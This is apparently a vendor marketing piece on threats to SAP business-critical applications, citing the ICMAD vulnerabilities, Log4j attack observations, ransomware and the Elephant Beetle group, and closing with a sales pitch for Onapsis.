Business-critical applications like SAP are the lifeblood of an enterprise. Considering 77% of the world’s transactional revenue touches an SAP system and 92% of the Forbes Global 2000 uses SAP, an orchestrated and successful attack on unprotected SAP systems could have far-reaching consequences. As the threat landscape continues to evolve, there’s a hole in your defense-in-depth security models - the application layer. Traditionally, security and IT teams believed these applications to be “safe” from threat actors as they were on-premises, behind network protection, and out of reach for attackers. That is no longer the case. As evidenced by threat intelligence from SAP and The Onapsis Research Labs, threat actors are increasingly targeting the application layer directly. These cybercriminals have the motivation, means, and expertise to identify and exploit unprotected business-critical SAP applications — and are actively doing so.
What's at risk?
Compliance, critical business operations, revenue, and more… Attackers with access to an unprotected SAP system can steal personal identifiable information (PII) from employees, customers, and suppliers; access financial records; deploy ransomware; and disrupt critical business processes such as supply chain management. For organizations that must meet regulatory compliance mandates, such an incident can lead to expensive third-party audits and penalties, including fines and legal action. Given that SAP software is used by more than 400,000 organizations globally, the need for security specific to the application layer is vital.
In a recent SAPinsider report, a third of participants said that they have suffered from some sort of credential compromise, malware, or cybersecurity attack that has impacted their SAP environment. And, while some were able to restore business as usual in less than a day, for over 60% it took a week or more to get back up and running. For many organizations, downtime of their SAP systems can cost up to tens of thousands in revenue per hour. Imagine the revenue loss if those SAP systems were offline for a week or more.
In the last few months, we have seen the impact of successful attacks and the associated adverse commercial and professional impact has never been greater.
ICMAD Vulnerabilities in SAP Applications
Onapsis and SAP partnered on the discovery and mitigation of a set of three vulnerabilities affecting the SAP Internet Communication Manager (ICM) component in SAP business-critical applications. These vulnerabilities require immediate attention by most SAP customers. One of the vulnerabilities, CVE-2022-22536, received the highest possible risk score, a 10 out of 10. As a result, CISA has issued a Current Activity Alert. If exploited, these vulnerabilities enable attackers to execute serious malicious activities on SAP users, business information, and processes — and ultimately compromise unpatched SAP applications.
Onapsis Research Labs’ threat intelligence cloud worked to understand the impact of this vulnerability on some of the most widely used SAP products. While we did not see any exploitation activity directly targeting SAP systems, we observed:
- 9,600+ attacks and more than 200 variants
- 400+ unique hosts attempting to exploit the Log4j vulnerability on our cloud
- Threat actors’ attempts to bypass firewalls include using base64 encoding; using uppercase/lowercase letter combinations; and leveraging obfuscation in order to avoid string matching
- Post-exploitation attempts have involved installing crypto miners and stealing AWS secrets
The threat of Log4j is very real and very dangerous and all organizations should identify vulnerable software and systems and take immediate action to mitigate or patch the Log4j vulnerability.
Almost every day, we see yet another case of ransomware, with recent news cycles revolving around debilitating attacks on business-critical systems of large enterprises—from fuel and energy companies to food processing companies. It’s not that these enterprises haven’t taken steps to protect these assets; it’s just that the “traditional” way of preparing for and responding to ransomware doesn’t address the application layer. Vulnerabilities such as 10KBLAZE, PayDay, and RECON allow threat actors to take full control of applications through the application layer itself. These threat actors go straight to the application, and, once in, go down to the operating system level there. Onapsis has observed that new, unprotected SAP applications provisioned in IaaS environments were discovered by threat actors and attacked in less than 3 hours, with 400+ successful exploitations observed. In this whitepaper, SAP and Onapsis outline several key steps organizations can take to minimize the risk of an attack on their business-critical SAP applications.
In January 2022, Sygnia’s Incident Response team released a report detailing the activities of a threat group Elephant Beetle that resulted in the theft of millions of dollars from Latin American financial sector organizations. Onapsis Research Labs’s Threat Intelligence Cloud analyzed activity related to two SAP NetWeaver Java vulnerabilities mentioned in the Sygnia report. They found over 350 exploitation attempts since January 2020 and that the vast majority of Onapsis-observed exploit attempts come from Asia and the US, indicating threat groups are leveraging these vulnerabilities on a global scale.
It’s clear the attackers aren’t waiting, so why are you?
A breach of any of these systems can have a critical impact on your business. The right application-based vulnerability management solution can provide organizations with deep visibility into the application landscape, automate assessments, and reduce remediation times for teams to achieve a greater risk reduction with less effort. Now is the time to protect your SAP systems; see how Onapsis can help.